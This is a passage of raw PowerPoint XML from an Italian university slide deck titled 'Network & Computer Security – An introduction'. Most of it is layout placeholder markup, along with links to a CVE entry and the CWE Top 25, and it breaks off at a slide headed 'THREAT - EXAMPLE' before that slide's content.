            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{120DBC88-5827-470E-B866-8C28F05E9D02}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1354159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onnettore 1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6" name="Segnaposto testo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it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Titolo 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180475" y="2947085"/>
            <a:ext cx="8686800" cy="1184825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto piè di pagina 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Segnaposto numero diapositiva 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5ED6358A-A210-4419-84F1-40229C5B5526}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18540093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0" name="Titolo 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301752" y="457200"/>
            <a:ext cx="8686800" cy="841248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Segnaposto contenuto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13" name="Segnaposto contenuto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Segnaposto data 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto piè di pagina 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto numero diapositiva 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EC297EE8-3AB6-409E-934C-F786427231C2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="514090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7" name="Connettore 1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29" name="Titolo 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="5410200"/>
            <a:ext cx="8610600" cy="882650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Segnaposto testo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it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Segnaposto testo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it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto contenuto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28" name="Segnaposto contenuto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8" name="Segnaposto data 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Segnaposto piè di pagina 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Segnaposto numero diapositiva 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="6477000"/>
            <a:ext cx="762000" cy="247650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{280E16A0-964C-435B-883F-4731412F9093}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3929121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0" name="Titolo 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301752" y="457200"/>
            <a:ext cx="8686800" cy="841248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto numero diapositiva 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF5F3B4D-34E9-45DB-9BDA-793CFBCCDFCE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280731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Segnaposto data 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto piè di pagina 23"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto numero diapositiva 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{32F33D96-D466-4F28-AE47-01D046754C45}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336968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5" name="Connettore 1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2" name="Titolo 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5486400"/>
            <a:ext cx="8458200" cy="520700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Segnaposto testo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it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Segnaposto contenuto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6" name="Segnaposto data 24"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto piè di pagina 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Segnaposto numero diapositiva 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{42438DFE-D3D9-48AF-8EDE-EB6E137EEB25}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4097489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13" name="Segnaposto immagine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it-IT" noProof="0" smtClean="0"/>
              <a:t>Fare clic sull'icona per inserire un'immagine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Titolo 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4993760"/>
            <a:ext cx="5867400" cy="522288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Segnaposto testo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it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto piè di pagina 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto numero diapositiva 30"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{58F68F90-B0AB-49D4-9A27-0622DA858A03}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1991405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Connettore 1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29" name="Segnaposto testo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smtClean="0"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0"/>
              <a:t>Secondo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0"/>
              <a:t>Terzo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0"/>
              <a:t>Quarto livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0"/>
              <a:t>Quinto livello</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Segnaposto data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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Segnaposto piè di pagina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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto numero diapositiva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solidFill>
                  <a:srgbClr val="D38E27"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E565AF83-8D73-41B8-AB11-57AAAF6658B2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Segnaposto titolo 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="457200"/>
            <a:ext cx="8686800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Connettore 1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2" name="Connettore 1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Tree>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45" r:id="rId4"/>
    <p:sldLayoutId id="2147484051" r:id="rId5"/>
    <p:sldLayoutId id="2147484046" r:id="rId6"/>
    <p:sldLayoutId id="2147484052" r:id="rId7"/>
    <p:sldLayoutId id="2147484053" r:id="rId8"/>
    <p:sldLayoutId id="2147484054" r:id="rId9"/>
    <p:sldLayoutId id="2147484047" r:id="rId10"/>
    <p:sldLayoutId id="2147484055" r:id="rId11"/>
  </p:sldLayoutIdLst>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hyperlink" Target="http://www.cvedetails.com/cve/CVE-2007-4509/"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we.mitre.org/top25/index.html#CWE-8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hyperlink" Target="http://goo.gl/8Xnnn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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Network &amp; Computer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Security – An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>introduction</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Sottotitolo 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Prof. Giovambattista Ianni – Università della Calabria</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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smtClean="0"/>
              <a:t>THREAT - EXAMPLE</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1557338"/>
            <a:ext cx="8686800" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
